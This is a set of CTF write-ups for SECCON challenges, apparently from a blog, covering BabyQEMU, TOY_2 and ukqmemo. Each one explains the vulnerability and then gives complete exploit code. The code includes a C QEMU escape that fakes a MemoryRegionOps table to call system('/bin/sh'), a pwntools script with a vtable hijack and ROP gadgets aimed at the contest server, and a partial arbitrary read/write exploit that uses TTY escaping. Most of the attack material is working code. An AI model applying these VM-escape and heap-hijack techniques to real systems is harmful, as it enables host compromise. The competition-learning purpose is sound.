分类 SECCON 下的文章

BabyQEMU

Vulnerability

This challenge implements a QEMU virtual char type PCI device, the device characteristics can be found in the header file corresponding to the following PCI device path in the file system:

img

Looking at the source code of the BABY device, it registers a section of mmio memory and implements the read/write methods respectively, and the vulnerability is usually found in the callback functions of these two methods:

static uint64_t pci_babydev_mmio_read(void *opaque, hwaddr addr, unsigned size) {
        PCIBabyDevState *ms = opaque;
        struct PCIBabyDevReg *reg = ms->reg_mmio;

        debug_printf("addr:%lx, size:%d\n", addr, size);

        switch(addr){
                case MMIO_GET_DATA:
                        debug_printf("get_data (%p)\n", &ms->buffer[reg->offset]);
                        return *(uint64_t*)&ms->buffer[reg->offset];
        }
        
        return -1;
}

static void pci_babydev_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
        PCIBabyDevState *ms = opaque;
        struct PCIBabyDevReg *reg = ms->reg_mmio;

        debug_printf("addr:%lx, size:%d, val:%lx\n", addr, size, val);

        switch(addr){
                case MMIO_SET_OFFSET:
                        reg->offset = val;
                        break;
                case MMIO_SET_OFFSET+4:
                        reg->offset |= val << 32;
                        break;
                case MMIO_SET_DATA:
                        debug_printf("set_data (%p)\n", &ms->buffer[reg->offset]);
                        *(uint64_t*)&ms->buffer[reg->offset] = (val & ((1UL << size*8) - 1)) | (*(uint64_t*)&ms->buffer[reg->offset] & ~((1UL << size*8) - 1));
                        break;
        }
}

static const MemoryRegionOps pci_babydev_mmio_ops = {
        .read       = pci_babydev_mmio_read,
        .write      = pci_babydev_mmio_write,
        .endianness = DEVICE_LITTLE_ENDIAN,
        .impl = {
                .min_access_size = 1,
                .max_access_size = 4,
        },
};

The following are the key architectures of the device:

struct PCIBabyDevReg {
        off_t offset;
        uint32_t data;
};

#define MMIO_SET_OFFSET    offsetof(struct PCIBabyDevReg, offset)
#define MMIO_SET_DATA      offsetof(struct PCIBabyDevReg, data)
#define MMIO_GET_DATA      offsetof(struct PCIBabyDevReg, data)

struct PCIBabyDevState {
        PCIDevice parent_obj;

        MemoryRegion mmio;
        struct PCIBabyDevReg *reg_mmio;

        uint8_t buffer[0x100];
};

As you can see from the program logic, mmio_write can control the value of reg->offset high and low respectively 4 bytes, and then read and write to buffer[reg->offset] in mmio_write and mmio_read respectively. The buffer[reg->offset] is located in the PCIBabyDevState structure of the device and is only 0x100 bytes long, which now creates an out-of-bounds read or write. This is the key vulnerability of the challenge.

Exploit

The PCIBabyDevState structure is created in QEMU's dynamic memory as the device is initialized, and it is actually a huge structure when expanded, meaning that there are many key pointers before and after the buffer that can be utilized. At its simplest, the ELF base address and libc base address leaks are simple.

img

The first thing we need to do is leak the ELF base and buffer heap addresses.

    unsigned long elf_leak = -1;
    set_offset(0x130);
    elf_leak = (unsigned long)read_data();
    set_offset(0x134);
    elf_leak += (unsigned long)read_data() << 32;
    printf("ELF leak: 0x%lx\n", elf_leak);
    unsigned long elf_base = elf_leak - 0x7b44a0;
    unsigned long system_plt = elf_base + 0x324150;
    printf("system@plt: 0x%lx\n", system_plt);

    unsigned long heap_leak = -1;
    set_offset(-0x38);
    heap_leak = (unsigned long)read_data();
    set_offset(-0x38+4);
    heap_leak += (unsigned long)read_data() << 32;
    printf("HEAP leak: 0x%lx\n", heap_leak);
    unsigned long buf_addr = heap_leak + 0x40;
    printf("buf addr: 0x%lx\n", buf_addr);

Then we're going to complete the control flow hijacking with MemoryRegion mmio as it unfolds with the following structure:

img

The ops are a table of callback functions that contain registration points for the mmio_write and mmio_read function pointers, and the first parameter is the opaque (device object itself) which sits in a contiguous section of memory with the buffer and which we can control.

img

img

The next solution is simple, we fake an ops in the buffer and emulate it according to the following memory layout. Where mmio_read is changed to the address of system@plt and the very beginning of the opaque object is overwritten with the string "/bin/sh\x00". This way, when we trigger mmio_read again, the control flow will be hijacked to execute system("/bin/sh").

    unsigned long fake_ops_table_off = 0x80;
    unsigned long fake_ops_table_addr = buf_addr + fake_ops_table_off;
    printf("fake ops table addr: 0x%lx\n", fake_ops_table_addr);
    printf("fake ops table off: 0x%lx\n", fake_ops_table_off);
/*
+0000 0x555556271100  70 21 90 55 55 55 00 00  b0 21 90 55 55 55 00 00  │p!.UUU..│.!.UUU..│
+0010 0x555556271110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0020 0x555556271120  02 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0030 0x555556271130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0040 0x555556271140  01 00 00 00 04 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0050 0x555556271150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
*/
    set_offset(fake_ops_table_off+0x20);
    write_data(0x2);
    set_offset(fake_ops_table_off+0x40);
    write_data(0x1);
    set_offset(fake_ops_table_off+0x44);
    write_data(0x4);
    set_offset(fake_ops_table_off+0x0);
    write_data(system_plt & 0xffffffff);
    set_offset(fake_ops_table_off+0x4);
    write_data(system_plt >> 32);
    set_offset(fake_ops_table_off+0x8);
    write_data(system_plt & 0xffffffff);
    set_offset(fake_ops_table_off+0xc);
    write_data(system_plt >> 32);

img

Code

// gcc exp.c -o ./release/rootfs/exp --static -s
// QEMU exploit
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stddef.h>

#define BABY_PCI_VENDOR_ID 0x4296
#define BABY_PCI_DEVICE_ID 0x1338

struct PCIBabyDevReg {
        off_t offset;
        uint32_t data;
};

#define MMIO_SET_OFFSET    offsetof(struct PCIBabyDevReg, offset)
#define MMIO_SET_DATA      offsetof(struct PCIBabyDevReg, data)
#define MMIO_GET_DATA      offsetof(struct PCIBabyDevReg, data)

const char baby_pci_mmio_path[] = "/sys/bus/pci/devices/0000:00:04.0/resource0";
char *mmio = NULL;

int open_device(){
    int fd = open(baby_pci_mmio_path, O_RDWR);
    if(fd < 0){
        perror("open");
        exit(1);
    }
    return fd;
}

int init_mmio(int fd){
    mmio = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(mmio == MAP_FAILED){
        perror("mmap");
        exit(1);
    }
    return 0;
}

void write_mmio_int32(uint64_t addr, uint32_t val){
    if (!mmio){
        perror("mmio not initialized");
        exit(1);
    }
    *(uint32_t *)(mmio + addr) = val;
}

void write_mmio_int64(uint64_t addr, uint64_t val){
    if (!mmio){
        perror("mmio not initialized");
        exit(1);
    }
    *(uint64_t *)(mmio + addr) = val;
}

uint32_t read_mmio_int32(uint64_t addr){
    if (!mmio){
        perror("mmio not initialized");
        exit(1);
    }
    return *(uint32_t *)(mmio + addr);
}

uint64_t read_mmio_int64(uint64_t addr){
    if (!mmio){
        perror("mmio not initialized");
        exit(1);
    }
    return *(uint64_t *)(mmio + addr);
}

int set_offset(uint64_t offset){
    write_mmio_int64(MMIO_SET_OFFSET, offset);
    return 0;
}

int write_data(uint32_t data){
    write_mmio_int32(MMIO_SET_DATA, data);
    return 0;
}

uint32_t read_data(){
    return read_mmio_int32(MMIO_GET_DATA);
}

int main(){
    int dev_fd = open_device();
    if(dev_fd < 0){
        perror("open_device");
        exit(1);
    }
    init_mmio(dev_fd);
    printf("mmio mmap: %p\n", mmio);
/*     set_offset(0x0);
    write_data(0xdeadbeef);
    printf("Read data: 0x%x\n", read_data());
    set_offset(0x4);
    write_data(0xdeadbeef);
 */
    // leak
    unsigned long elf_leak = -1;
    set_offset(0x130);
    elf_leak = (unsigned long)read_data();
    set_offset(0x134);
    elf_leak += (unsigned long)read_data() << 32;
    printf("ELF leak: 0x%lx\n", elf_leak);
    unsigned long elf_base = elf_leak - 0x7b44a0;
    unsigned long system_plt = elf_base + 0x324150;
    printf("system@plt: 0x%lx\n", system_plt);

    unsigned long heap_leak = -1;
    set_offset(-0x38);
    heap_leak = (unsigned long)read_data();
    set_offset(-0x38+4);
    heap_leak += (unsigned long)read_data() << 32;
    printf("HEAP leak: 0x%lx\n", heap_leak);
    unsigned long buf_addr = heap_leak + 0x40;
    printf("buf addr: 0x%lx\n", buf_addr);

    // check ops_ptr
    //unsigned long ops_ptr = -1;
    //set_offset(-0xc8);
    //ops_ptr = (unsigned long)read_data();
    //set_offset(-0xc8+4);
    //ops_ptr += (unsigned long)read_data() << 32;
    //printf("ops ptr: 0x%lx\n", ops_ptr);    

    // hijack ops_table
    unsigned long fake_ops_table_off = 0x80;
    unsigned long fake_ops_table_addr = buf_addr + fake_ops_table_off;
    //unsigned long fake_ops_table_addr = elf_base + 0x19fb000;
    //unsigned long fake_ops_table_off =  - (buf_addr - fake_ops_table_addr);
    printf("fake ops table addr: 0x%lx\n", fake_ops_table_addr);
    printf("fake ops table off: 0x%lx\n", fake_ops_table_off);
/*
+0000 0x555556271100  70 21 90 55 55 55 00 00  b0 21 90 55 55 55 00 00  │p!.UUU..│.!.UUU..│
+0010 0x555556271110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0020 0x555556271120  02 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0030 0x555556271130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0040 0x555556271140  01 00 00 00 04 00 00 00  00 00 00 00 00 00 00 00  │........│........│
+0050 0x555556271150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │........│........│
*/
    set_offset(fake_ops_table_off+0x20);
    write_data(0x2);
    set_offset(fake_ops_table_off+0x40);
    write_data(0x1);
    set_offset(fake_ops_table_off+0x44);
    write_data(0x4);
    set_offset(fake_ops_table_off+0x0);
    write_data(system_plt & 0xffffffff);
    set_offset(fake_ops_table_off+0x4);
    write_data(system_plt >> 32);
    set_offset(fake_ops_table_off+0x8);
    write_data(system_plt & 0xffffffff);
    set_offset(fake_ops_table_off+0xc);
    write_data(system_plt >> 32);

    puts("fake ops table created");

    // write "/bin/sh\x00"(0x68732f6e69622f) into opaque
    unsigned long opaque_off = -0xbf8;
    set_offset(opaque_off);
    write_data(0x68732f6e69622f & 0xffffffff);
    set_offset(opaque_off+4);
    write_data(0x68732f6e69622f >> 32);
    puts("wrote /bin/sh into opaque");

    // hijack ops_ptr
    unsigned long ops_ptr_pff = -0xc8;
    set_offset(ops_ptr_pff);
    write_mmio_int32(MMIO_SET_DATA, fake_ops_table_addr & 0xffffffff);
    puts("hijacked ops_ptr");

    // trigger
    read_data();

    return 0;
}

TOY_2

The challenge provides a 16bit risc-VM written in cpp.

The exploit happens in case 13(STT): the valid addr (or addr & (0x1000-1) ,specificly) ranges from 0 to 0xfff, and will do:

  • mem[addr]=val&0xff
  • mem[addr+1]=val>>8

So when addr = 0xfff, there will be an off-by-one. In GDB, we can see that this one byte is just the lowest byte of the mem pointer. (and the next 8 byte is the uint16_t size of the std::span object)

In that case, we can do mem:=mem+0x10 by this:

a:=0x00c8 # mem is an heap pointer and mem&0xff=0xb8=0xc8-0x10
t:=a
a:=0xfff # off by one
stt

But the pc pointer will jump to the former pc+0x10, because the fetch_and_decode() also uses mem[regs.pc] to fetch code. And there will be several times of rebase like this during the whole exp😭.

After that, we can increase the size of the memory space. But it doesn't help a lot, since the size is stored as uint16_t, and should be correct when executing addr&(size-1) . So we set size to 0x8000.

Back to the VM insts, we can know that when a pointer drops in space ranging from mem to mem+size, we can use adc or another insts to write a program to calculate the offset, and forge fake structure, without leaking them to stdout.

Now there is a heap pointer in this space. And now the vtable pointer of the object drops at the mem-0x18 , so we should do mem:=mem-0x20 and rebase again 😭.

Back to the VM insts again, when we use case 7 illegal, the VM will raise an error and back to the main function to execute the handler. After printing Done the program will call object->dump() (0x8 of the vtable). So we can forge a fake vtable in memory to trigger the fake handler, and hijack the control flow.

We have heap pointer of mem and text pointer of vtable now, and need libc pointer.

Luckily, after calling the error handler, there will be a new chunk on the heap, just after our VM object, with a lot of pointers from libstdc++. In the same ubuntu machine, the offset between libc and libstdc++ will be an unknown constant, so we can try to calculate it.(Fortunately the local offset in my VM and the remote offset are the same, in the same docker environment)

So we can draw a route:

  1. Rebase the mem to increase the size of VM-memory, and enclose the heap text pointers, as well as the vtable member of the object.
  2. Forge a new vtable with its dump function as main, and make the obj->vtable point to it.
  3. Execute inst 7, to trigger the error handler, malloc a handler chunk after the VM object, and run main function again.
  4. The main function will alloc a new VM object, whose memory space drops after the error handler chunk.

    1. Now the heapspace is like:
      [-----------old VM----------]|[--error-hndl--]|[-----------new VM----------]
       -                                                                        +
  1. Do Step 1 in the new VM again. Then rebase it again (mem:=mem-0x60 in my exp) to enclose an libstdc++ pointer.
  2. Make fake vtable again, to hijack the control flow with gadget in libc .
  3. Execute inst 7 and getshell.

To get shell,forge a vtable like that:

heap_mem_1:
fake_vtable+0 = heap_mem_2
fake_vtable+8 = gadget1
fake_vtable+0x18 = gadget2
fake_vtable+0x18 = system_addr
---
heap_mem_2:
+0x00: "/bin/sh\x00"
...
+0x38: &fake_vtable

gadget1:mov rdi, qword ptr [rax] ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 0x18]
gadget2:call qword ptr [rax + 0x20]

We use gadget2 to call again to align the stack pointer before calling system.

Scripts

exp.py:

from pwn import *
from data import dt,getdt2
def pack_code(op, addr):
    c = (op << 12) | (addr & 0xfff)
    return p16(c)

#p = remote('127.0.0.1', 8887)
p=remote('toy-2.seccon.games',5000)

# sleep(0.2)

def stt():
    return pack_code(13,0)
def lda(x):
    return pack_code(14,x)
def tat():
    return pack_code(5,0)
def ill():
    return pack_code(7,0)
def ldc(x):
    return pack_code(9,x)
def adc(x):
    return pack_code(1,x)
def ldi():
    return pack_code(12,0)
def jmp(x):
    return pack_code(0,x)
def anda(x):
    return pack_code(8,x)
def bcc(x):
    return pack_code(10,x)

def r2(x):
    return x+0x20

targ=r2(0xc00)

code = b"".join([
    lda(0x802), #0
    tat(),
    lda(0x800),
    stt(), # offset +0x10

    lda(r2(0x810)),#8
    ldi(),
    tat(),
    lda(r2(0x80e)),
    
    stt(),
    lda(r2(0x814)),
    ldi(),
    jmp(r2(0x81a)),

    lda(0x804), #18
    tat(),
    lda(0x806),
    stt(),

    lda(0x808), #20
    tat(),
    lda(0x80a),
    stt(),

    tat(),#28
    lda(r2(0x812)),
    stt(),
    lda(r2(0x818)),

    ldi(),#30
    tat(),
    lda(r2(0x816)),
    stt(),

    # ofs+text=main -> targ+8
    lda(r2(0x81c)),#38
    adc(8),
    tat(),
    lda(r2(0x820)),
    stt(),#40

    lda(r2(0x81e)),
    adc(0xa),
    tat(),
    lda(r2(0x822)),#48
    stt(),

    lda(r2(0x81e)),
    adc(0xc),
    tat(),#50
    lda(r2(0x824)),
    stt(),
    
    lda(r2(0x81e)),
    adc(0xe),#58
    tat(),
    lda(r2(0x826)),
    stt(),

#heap + ofs -> virtual
    ldc(r2(0x828)),#ldc! #60
    adc(targ),
    tat(),
    lda(r2(0x82c)),
    stt(),#68

    lda(r2(0x82a)),
    adc(targ+2),
    tat(),
    lda(r2(0x82e)),#70
    stt(),

    lda(r2(0x82a)),
    adc(targ+4),
    tat(),#78
    lda(r2(0x830)),
    stt(),

    ill(),
    lda(r2(0x828)),#<--back
    ill(),

])
print(hex(u64(code[0:8])))
payload=code.ljust(0x800,b"\0")

payload+=dt
payload = payload.ljust(4096, b'\x00')



# print(payload)

p.send(payload)

pause()

#new payload at 0x5a7b9b3123c8
#leak stdcpp at 0x5a7b9b312360 ofs 0x26eff0

def r3(x):
    return r2(x)+0x60

targ=r3(0xc00)
code2 = b"".join([
    lda(0x802), #0
    tat(),
    lda(0x800),
    stt(), # offset +0x10

    lda(r2(0x810)),#8
    ldi(),
    tat(),
    lda(r2(0x80e)),
    
    stt(),#10
    lda(r2(0x814)),
    ldi(),
    jmp(r2(0x81a)),

    lda(0x804), #18
    tat(),
    lda(0x806),
    stt(),

    lda(0x808), #20
    tat(),
    lda(0x80a),
    stt(),

    tat(),#28
    lda(r2(0x812)),
    stt(),
    lda(r2(0x818)),

    ldi(),#30
    tat(),
    lda(r2(0x816)),
    stt(),

    # ofs+text=main -> targ+8
    lda(r2(0x81c)),#38
    adc(8),
    tat(),
    lda(r2(0x820)),
    stt(),#40

    lda(r2(0x81e)),
    adc(0xa),
    tat(),
    lda(r2(0x822)),#48
    stt(),

    lda(r2(0x81e)),
    adc(0xc),
    tat(),#50
    lda(r2(0x824)),
    stt(),
    
    lda(r2(0x81e)),
    adc(0xe),#58
    tat(),
    lda(r2(0x826)),
    stt(),
]+[
    jmp(r2(0x838)),#60
    jmp(r3(0x83a)),
    ill()
]
+[tat()]*(0x31-3-4)
+[
    lda(r2(0x834)),#ba
    tat(),#bc
    lda(r2(0x836)),#be
    stt(),#c0
]+[
    #make system to fakevt+0x18
    ldc(r3(0x83c)),#0xc2
    adc(8),
    tat(),
    lda(r3(0x846)),
    stt(),

    lda(r3(0x83e)),
    adc(0xa),
    tat(),
    lda(r3(0x848)),
    stt(),

    lda(r3(0x844)),
    adc(0xc),
    tat(),
    lda(r3(0x84a)),
    stt(),

    lda(r3(0x844)),
    adc(0xe),
    tat(),
    lda(r3(0x84c)),
    stt(),

    #make gadget to fakevt+0x8

    ldc(r3(0x840)),#0xc2
    adc(8),
    tat(),
    lda(r3(0x84e)),
    stt(),

    lda(r3(0x842)),
    adc(0xa),
    tat(),
    lda(r3(0x850)),
    stt(),

    lda(r3(0x844)),
    adc(0xc),
    tat(),
    lda(r3(0x852)),
    stt(),

    lda(r3(0x844)),
    adc(0xe),
    tat(),
    lda(r3(0x854)),
    stt(),

    #ptr to binsh

    ldc(r3(0x85e)),#0xc2
    adc(0xce0),
    tat(),
    lda(r3(0x856)),
    stt(),

    lda(r3(0x860)),
    adc(0xce2),
    tat(),
    lda(r3(0x858)),
    stt(),

    lda(r3(0x860)),
    adc(0xce4),
    tat(),
    lda(r3(0x85a)),
    stt(),

    lda(r3(0x860)),
    adc(0xce6),
    tat(),
    lda(r3(0x85c)),
    stt(),

    #ptr binsh+0x38

    ldc(r3(0x862)),#0xc2
    adc(0xce0),
    tat(),
    lda(r3(0x864)),
    stt(),

    lda(r3(0x860)),
    adc(0xce2),
    tat(),
    lda(r3(0x866)),
    stt(),

    lda(r3(0x860)),
    adc(0xce4),
    tat(),
    lda(r3(0x868)),
    stt(),

    lda(r3(0x860)),
    adc(0xce6),
    tat(),
    lda(r3(0x86a)),
    stt(),

    #hijack vtable

    ldc(0xd70+0x38+0),
    tat(),
    ldc(r3(0x86c)),
    stt(),

    ldc(0xd70+0x38+2),
    tat(),
    ldc(r3(0x86c+2)),
    stt(),

    ldc(0xd70+0x38+4),
    tat(),
    ldc(r3(0x86c+4)),
    stt(),

    ldc(0xd70+0x38+6),
    tat(),
    ldc(r3(0x86c+6)),
    stt(),

#set gad2 to fakevt+0x18

    ldc(r3(0x87c)),#0xc2
    adc(8),
    tat(),
    lda(r3(0x874)),
    stt(),

    lda(r3(0x87e)),
    adc(0xa),
    tat(),
    lda(r3(0x876)),
    stt(),

    lda(r3(0x844)),
    adc(0xc),
    tat(),
    lda(r3(0x878)),
    stt(),

    lda(r3(0x844)),
    adc(0xe),
    tat(),
    lda(r3(0x87a)),
    stt(),


    ill(),
]
)
print(hex(u64(code[0:8])))
payload=code2.ljust(0x800,b"\0")

payload+=getdt2()
payload=payload.ljust(0x800+0x500,b"\0")
payload+=b"/bin/sh\0"

payload = payload.ljust(4096, b'\x00')
p.send(payload)
p.interactive()

data.py

targ=0xc20
from pwn import *
dt=b"".join([
    p16(0x0fff),#0
    p16(0xc8c8),#2
    b"\0"*0x10,
    p16(0x0080),#4
    p16(0x0ff9),#6
    p16(0xa800),#8
    p16(0x0fef),#a
    p16(0x2333),#c
    p16(targ),#e

    p16(0x1010),#10
    p16(targ+2),#12
    p16(0x1012),#14
    p16(targ+4),#16

    p16(0x1014),#18
    p16(0x28+0x10),#1a
    p16(0xda60),#1c
    p16(0xffff),#1e

    p16(targ+8),#20
    p16(targ+0xa),#22
    p16(targ+0xc),#24
    p16(targ+0xe),#26


    p16(0xc20),#28
    p16(0),#2a
    p16(8),#2c
    p16(0xa),#2e
    p16(0xc),#30
    p16(0xe),#32
])
#0x0000000000171cf6 : mov rdi, qword ptr [rax] ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 0x18]
def getdt2(ofs=0x240000):
    stdcpp_ofs=0x26eff0
    syst_ofs=-stdcpp_ofs-ofs+0x58740+2**64
    gadget_ofs=-stdcpp_ofs-ofs+0x171cf6+2**64
    gad2_ofs=0x00000000000958ea-stdcpp_ofs-ofs+2**64
    targ=0xc20+0x60
    fakevt=0xe00
    dt2=b"".join([
    p16(0x0fff),#0
    p16(0xd8d8),#2
    b"\0"*0x10,
    p16(0x0080),#4
    p16(0x0ff9),#6
    p16(0xb800),#8
    p16(0x0fef),#a
    p16(0x2333),#c
    p16(targ),#e

    p16(0x1010),#10
    p16(targ+2),#12
    p16(0x1012),#14
    p16(targ+4),#16

    p16(0x1014),#18
    p16(0x28+0x10),#1a
    p16(0xda60),#1c
    p16(0xffff),#1e

    p16(targ+8),#20
    p16(targ+0xa),#22
    p16(targ+0xc),#24
    p16(targ+0xe),#26


    p16(0xc20),#28
    p16(0),#2a
    p16(8),#2c
    p16(0xa),#2e
    p16(0xc),#30
    p16(0xe),#32

    p16(0x5800),#34
    p16(0x100f),#36
    p16(0x00ba+0x10),#38
    p16(0xc2+0x10+0x60),#3a

    p64(syst_ofs)[0:2],#3c
    p64(syst_ofs)[2:4],#3e
    p64(gadget_ofs)[0:2],#40
    p64(gadget_ofs)[2:4],#42
    p16(0xffff),#44

    p16(fakevt+0x18+8),#46
    p16(fakevt+0x1a+8),#48
    p16(fakevt+0x1c+8),#4a
    p16(fakevt+0x1e+8),#4c

    p16(fakevt+0x8),#4e
    p16(fakevt+0xa),#50
    p16(fakevt+0xc),#52
    p16(fakevt+0xe),#54

    p16(fakevt+0),#56
    p16(fakevt+2),#58
    p16(fakevt+4),#5a
    p16(fakevt+6),#5c

    p16(0xd10),#5e
    p16(0),#60
    p16(0xda0),#62

    p16(0xd70+0x38+0),#64
    p16(0xd70+0x38+2),#66
    p16(0xd70+0x38+4),#68
    p16(0xd70+0x38+6),#6a

    p16(0x68),#6c
    p16(0x68+2),#6e
    p16(0x68+4),#70
    p16(0x68+8),#72

    p16(fakevt+0x18),#74
    p16(fakevt+0x1a),#76
    p16(fakevt+0x1c),#78
    p16(fakevt+0x1e),#7a
    p64(gad2_ofs)[0:2],#7c
    p64(gad2_ofs)[2:4],#7e

    

    ])
    return dt2

0x00 漏洞点

  • 用户态在 free_space 中读写的时候,使用 f_pos 来控制读写偏移,f_pos 有 0x3FFFFFFF 最大值限制

    image-20230920182346105

    • 最开始想着 read/write 会不会有逻辑问题导致 overlap 的发生去修改 fixed_space 的 meta 区域的指针构造任意地址读写,但是看了很久代码确认其没有这样的逻辑问题
    • 使用 offset = 0x3FFFFFFF-1-0x1000, size = n 这样的组合去读 free_space 看着像是会越界,但是不知道越界所读到的是什么,最开始是直接猜测会读到内核中一些对用户态没帮助的数据,但是实际上神奇的点就在这。不过在 user mode 题所给出的代码中完全看不出来具体的漏洞原因是什么,需要通过 kernel mode 题给出的源码中找到原因,当然如果随手试一试上面的那个边界条件来读东西就会发现有点端倪的...
    • 这里唯一要注意的一个东西就是,如果 data 为 NULL(一开始没去考虑这种情况),那么这个读循环是不会终止的,循环继续下去 f_pos 也会递增从而有可能超过之前的最大值限定,产生“非预期”行为

    over_rw_reason_code_2

  • 下一步就是使用 kernel mode 的代码查看 get_memo_ro 的实现,它把传进去的 pos 按页对齐后传给了 __pgoff_to_memopage

    over_rw_reason_code_3

    • 这个函数是问题的关键。这个函数从一个二级页表结构中,取出 f_pos 所命中的页面。每一级页表都是一个 0x200 大小的指针表,只不过在初始情况下第一级页表中,只有第一项是有值的,其它都是 NULL,导致只要超出第一个页表去读写时都会返回 NULL,于是用户会读写不到任何东西(但是也不会报错)

    over_rw_reason_code_0

    over_rw_reason_code_1

    • 一级页表的最后一项和第一项

    page_level_1

    • 存在一个问题,如果 f_pos 从 0x3FFFFFFF-1 开始读写,会拿到一个空的页表项,返回空指针;然后 f_pos 继续增长,此时会超过 0x3FFFFFFF,通过计算之后,一级页表的下表会变成 0 导致产生严重的 overlap 去读写 fixed_space 的 meta 指针区域

    over_rw_reason

    • meta 指针表,其中的指针和 libc 有固定偏移,可以泄露 libc 地址;通过写指针然后用 fixed_read 可以进一步泄露出栈地址

    free_space_over_read

0x01 利用的坑

  • 看起来可以任意地址读写之后就可以为所欲为了,直接读栈地址,写 rop 到栈上就搞定了,但是有一个巨大的坑,那就是远程交互是通过 TTY 处理再输入到程序的 STDIN 中的,这个过程部分特殊字符会被 TTY 处理产生别的效果。例如写指针要用到的 \x7f 对应的控制效果是 DEL,这会导致它本身和它前一个字符在输入到 STDIN 时消失,还有其他比如 Ctrl+C 等会导致进程结束...尝试通过 \x16 等字符也没有成功 escape,花了很久时间最后决定尝试绕掉 \x7f 的坑;
  • 首先,任意地址读写的时候,由于读写的都是 libc 或者 栈地址,所以只控制 meta 指针的低 5 字节即可;
  • 由于程序本身几乎没有可用 gadget,如果写 libc 地址,又要面临 \x7f 的问题,所以不能很顺利写 ROP 到栈上;
  • 写栈上 main 函数返回地址的时候,由于需要使用 fixed_write 功能来写,不能自由控制写入的字节数量(固定为0x100),会导致终端的换行符被一并写入,覆盖掉高位,所以需要尝试把要写入的 5 字节放在 0x100 字节的末尾,不过这样就得从 target-(0x100-5) 的地方开始写,容易破坏其它东西,所以用了下面这个方法来劫持一个高位为 0x7f 的指针,同时不破坏正常数据,唯一的要求就是返回地址之后一定距离内要有一个高位为 \x7f 的指针;

    • image-20230920190922703
  • 最开始发现,在这个位置能刚好满足 one_gadget 条件,但是劫持过去才发现 busybox 环境对 argv[0] 有要求,one_gadget 不起作用;
  • 然后就开始漫长的走弯路。。。构造了好久 rtld_global。。。最后也没用;
  • 折腾了一大通才发现,用户态程序开了 栈可执行(??????),在 buff 中写 shellcode 然后用上述方法劫持指针跳过去就搞定了。。。

0x02 其它

  • 有一个没用上但是很神奇的思路,libc 地址最高字节有一定概率为 \x7e ,在这种条件下任意地址写时可以不用考虑 \x7f 的限制从而写 libc 的任意地址(但是写不了栈),而且这个题目中进退出了连接不会断,而是会回到 login 界面,给了这种爆破很大的可能性,以至于让我一度以为这个是预期解法...

0x03 EXP

from pwn import *
import os

context.log_level = "debug"
context.arch = "amd64"

#p = process("./run.sh")
p = remote("ukqmemo.seccon.games", 6318)

def free_space():
    p.sendlineafter(b"> ", b"2")
    
def free_read(offset:int, size:int):
    p.sendlineafter(b"S> ", b"1")
    p.sendlineafter(b"Offset: ", str(offset).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    
def free_write(offset:int, size:int, data):
    p.sendlineafter(b"S> ", b"2")
    p.sendlineafter(b"Offset: ", str(offset).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    p.sendlineafter(b"Input: ", data)
    
def free_back():
    p.sendlineafter(b"S> ", b"0")
    
def fixed_space():
    p.sendlineafter(b"> ", b"1")
    
def fixed_read(idx):
    p.sendlineafter(b"M> ", b"1")
    p.sendlineafter(b"Index: ", str(idx).encode())
    
def fixed_write(idx, data):
    p.sendlineafter(b"M> ", b"2")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Input: ", data)

def fixed_back():
    p.sendlineafter(b"M> ", b"0")
    
def escape(x):
    return b''.join(
        bytes([i])
        if (i>=0x20 and i!=0x7f) or i==0 else
        bytes([0x16, i])
        for i in x)
        
def write_primitive(addr, value, no_back=False):
    free_space()
    payload = b"\x00\x00" + p64(addr)[:5]
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    print(f"write {value.hex()} to addr({hex(addr)})")
    fixed_space()
    fixed_write(0, value)
    if not no_back:
        fixed_back()
    
def read_primitive(addr):
    free_space()
    payload = b"\x00\x00" + p64(addr)[:5]
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    fixed_space()
    fixed_read(0)
    fixed_back()
        
def check_payload(payload):
    cnt = 0
    for i in payload:
        if i in [0x3,0x4,0xa,0x11,0x13,0x14,0x15,0x18,0x19,0x1a,0x1c,0x7f]:
            print("bad char:", cnt, hex(i))
            return False
        cnt += 1
    return True
        

def exp():
    _pow = 1
    if _pow:
        p.recvuntil(b"hashcash -mb26 ")
        val = p.recvuntil(b"\n", drop=True)
        res = os.popen(f"hashcash -mb26 {val.decode()}").read()
        p.sendlineafter(b"hashcash token: \n", res.encode())
        

    p.sendlineafter(b"buildroot login: ", b"ctf")
    
    # leak mmap addr & libc addr
    free_space()
    free_read(0x3FFFFFFF-1-0x1000, 0x10)
    p.recvuntil(b"Output: \x00\x00")
    leak1 = u64(p.recv(8))
    memo_base = leak1 - 0x100
    libc_base = memo_base + 0x3000
    environ = libc_base + 0x185160
    print("leak1:", hex(leak1))
    print("memo_base:", hex(memo_base))
    print("libc_base:", hex(libc_base))
    print("environ:", hex(environ))
    
    # leak environ
    tmp = b"\x00\x00" + p64(environ)[:5]
    payload = tmp
    print("payload1:", payload.hex())
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    free_space()
    free_read(0x3FFFFFFF-1-0x1000, 0x10)
    free_back()
    
    fixed_space()
    fixed_read(0)
    p.recvuntil(b"Output: ")
    stack_leak = u64(p.recv(8))
    print("stack_leak:", hex(stack_leak))
    fixed_back()
    
    # leak program base
    free_space()
    bin_leak_ptr = stack_leak+0xf0
    tmp = b"\x00\x00" + p64(bin_leak_ptr)[:5]
    payload = tmp
